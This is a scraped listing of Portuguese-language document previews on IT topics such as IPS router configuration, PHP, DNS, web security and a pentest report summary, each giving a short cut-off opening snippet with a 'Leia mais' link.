Configuração do Intrusion Prevention System (IPS) para o roteador da Segurança do gigabit do Sem fio-n WRVS4400N Objetivo Os sistemas da prevenção de intrusão (IPS) são os dispositivos da segurança de
Leia maissaída durante o runtime Usando Functions de uma Única Linha para Personalizar Relatórios Mostrar as diferenças entre as functions SQL de uma única
Tópicos do Curso: Introdução Listar os principais recursos do Banco de Dados Oracle 10g Apresentar uma visão geral de: componentes, plataforma de internet, servidor de aplicações e suite do desenvolvedor
Leia maisANEXO VII Perfil para futuros concursos de TI da UNIFESP
ANEXO VII Perfil para futuros concursos de TI da UNIFESP Proposição de perfil para futuros concursos de TI da UNIFESP (ainda não foi utilizado) 174 Perfil para futuros concursos de TI da UNIFESP 1º. Cargo:
Leia maisWeb Interativa com Ajax e PHP
Web Interativa com Ajax e PHP Juliano Niederauer Novatec Copyright 2007, 2013 da Novatec Editora Ltda. Todos os direitos reservados e protegidos pela Lei 9.610 de 19/02/1998. É proibida a reprodução desta
Leia maisCapítulo 7. A camada de aplicação
Capítulo 7 A camada de aplicação slide 1 slide 2 DNS Sistema de Nomes de Domínio O espaço de nomes DNS Registros de recursos de domínio Servidores de nome slide 3 O espaço de nomes DNS (1) Parte do espaço
Leia maisDesenvolvendo Websites com PHP
Desenvolvendo Websites com PHP 3ª Edição Juliano Niederauer Novatec Copyright 2009, 2011, 2017 da Novatec Editora Ltda. Todos os direitos reservados e protegidos pela Lei 9.610 de 19/02/1998. É proibida
Leia mais[2011] Usabilidade. Manual Gerenciador Usuários. escritórios contábeis. Neo Solutions - Soluções para gestão de
Manual Gerenciador Usuários Usabilidade Neo Solutions - Soluções para gestão de escritórios contábeis [2011] Neo Solutions WWW.neosolutions.com.br neosolutions@neosolutions.com.br 11 3115 0188 ÍNDICE 1.
Leia maisSegurança na WEB Ambiente WEB estático
Segurança de Redes Segurança na WEB Prof. Rodrigo Rocha prof.rodrigorocha@yahoo.com Servidor IIS Apache Cliente Browser IE FireFox Ambiente WEB estático 1 Ambiente Web Dinâmico Servidor Web Cliente Navegadores
Leia maisExemplo da (in)segurança de um site sem HTTPS
Exemplo da (in)segurança de um site sem HTTPS Date : 9 de Janeiro de 2014 Nos dias que correm, é importante que todos os dados sensíveis transaccionados entre um cliente e um servidor sejam cifrados de
Leia maisMASTERSAF REDF SP CONFIGURAÇÃO E CRIPTOGRAFIA
ÍNDICE OBJETIVO... 3 CONFIGURAÇÃO DO TOMCAT 5.5... 3 PASSOS NECESSÁRIOS... 3 CONFIGURANDO O SERVIDOR DE BANCO DE DADOS... 9 SCRIPTS DDL... 9 INICIANDO A INSTALAÇÃO... 9 CONFIGURANDO O MENU DO SISTEMA REDF...
Leia maisigrpweb Índice gráfico Cliente NOSi igrpweb Referência Versão 1.00 Status
igrpweb Índice gráfico Cliente NOSi igrpweb Referência Versão 1.00 Status Conteúdo Enquadramento... 2 1 IGRP Studio... 3 2 O Guia Inicial Rápido... 4 3 O Gerador de Código... 5 4 O File editor... 6 5 BPMN
Leia maisA CASA DO SIMULADO DESAFIO QUESTÕES MINISSIMULADO 38/360
1 DEMAIS SIMULADOS NO LINK ABAIXO CLIQUE AQUI REDE SOCIAL SIMULADO 38/360 INFORMÁTICA INSTRUÇÕES TEMPO: 30 MINUTOS MODALIDADE: CERTO OU ERRADO 30 QUESTÕES CURTA NOSSA PÁGINA MATERIAL LIVRE Este material
Leia maisLaudo resumido do Pentest do sistema ALVO no ambiente da empresa CLIENTE ALVO
Laudo resumido do Pentest do sistema ALVO no ambiente da empresa CLIENTE ALVO Requerente: DIRETOR DA EMPRESA ALVO. Pentester: Petter Anderson Lopes. Período: de 10/2015 a 06/2016. Modelo: Gray Hat. Ambiente:
Leia mais